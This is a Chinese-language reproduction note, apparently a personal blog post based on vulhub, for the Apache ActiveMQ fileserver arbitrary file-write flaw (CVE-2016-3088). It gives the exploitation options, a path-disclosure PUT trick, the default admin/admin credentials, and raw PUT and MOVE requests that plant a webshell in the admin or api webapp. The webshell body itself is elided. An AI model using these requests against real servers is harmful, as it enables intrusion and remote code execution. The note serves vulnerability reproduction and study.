Apache ActiveMQ Fileserver远程代码执行漏洞(CVE-2016-3088)

本文来源于vulhub漏洞库，为本人复现笔记，如有侵权可联系我删除*
该漏洞工作中遇到过几次，记个笔记先

漏洞详情

ActiveMQ的web控制台分三个应用，admin、api和fileserver，其中admin是管理员页面，api是接口，fileserver是储存文件的接口；admin和api都需要登录后才能使用，fileserver无需登录。
fileserver是一个RESTful API接口，我们可以通过GET、PUT、DELETE等HTTP请求对其中存储的文件进行读写操作，其设计目的是为了弥补消息队列操作不能传输、存储二进制文件的缺陷，但后来发现：

• 其使用率并不高
• 文件操作容易出现漏洞

所以，ActiveMQ在5.12.x~5.13.x版本中，已经默认关闭了fileserver这个应用（你可以在conf/jetty.xml中开启之）；
在5.14.0版本以后，彻底删除了fileserver应用。

在测试过程中，可以关注ActiveMQ的版本，避免走弯路。

本漏洞出现在fileserver应用中，漏洞原理其实非常简单，就是fileserver支持写入文件（但不解析jsp），同时支持移动文件（MOVE请求）。所以，我们只需要写入一个文件，然后使用MOVE请求将其移动到任意位置，造成任意文件写入漏洞。

文件写入有几种利用方法：

• 写入webshell
• 写入cron或ssh key等文件
• 写入jar或jetty.xml等库和配置文件

写入webshell的好处是，门槛低更方便，但前面也说了fileserver不解析jsp，admin和api两个应用都需要登录才能访问（有默认密码），所以有点鸡肋；写入cron或ssh key，好处是直接反弹拿shell，也比较方便，缺点是需要root权限；写入jar，稍微麻烦点（需要jar的后门），写入xml配置文件，这个方法比较靠谱，但有个鸡肋点是：我们需要知道activemq的绝对路径。

分别说一下上述几种利用方法。

漏洞复现

写入webshell

写入webshell，需要写在admin或api应用中，而这俩应用都需要登录才能访问。
http://10.155.22.42:8161/admin/页面存在默认账号密码，默认的ActiveMQ账号密码均为admin。

一、获取路径有两种方式

1. 我工作中一般是：

put /fileserver/a../../%08/../%08/..%08/.%08/%08 HTTP/1.1

然后会爆出物理路径。

C:\ZTE E_guard\USMS\CoreService\bin\activemq\webapps\admin
C:\ZTE E_guard\USMS\CoreService\bin\activemq\webapps\fileserver\

2. 或者访问http://your-ip:8161/admin/test/systemProperties.jsp，查看ActiveMQ的绝对路径：
   

二、PUT一个JSP文件到fileserver目录

PUT /fileserver/2.txt HTTP/1.1
Host: localhost:8161
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Length: 120976

webshell...

三、利用MOVE方法将该JSP移动到admin目录

MOVE /fileserver/2.txt HTTP/1.1
Destination: file:///opt/activemq/webapps/api/s.jsp
Host: localhost:8161
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Length: 0

四、访问webshell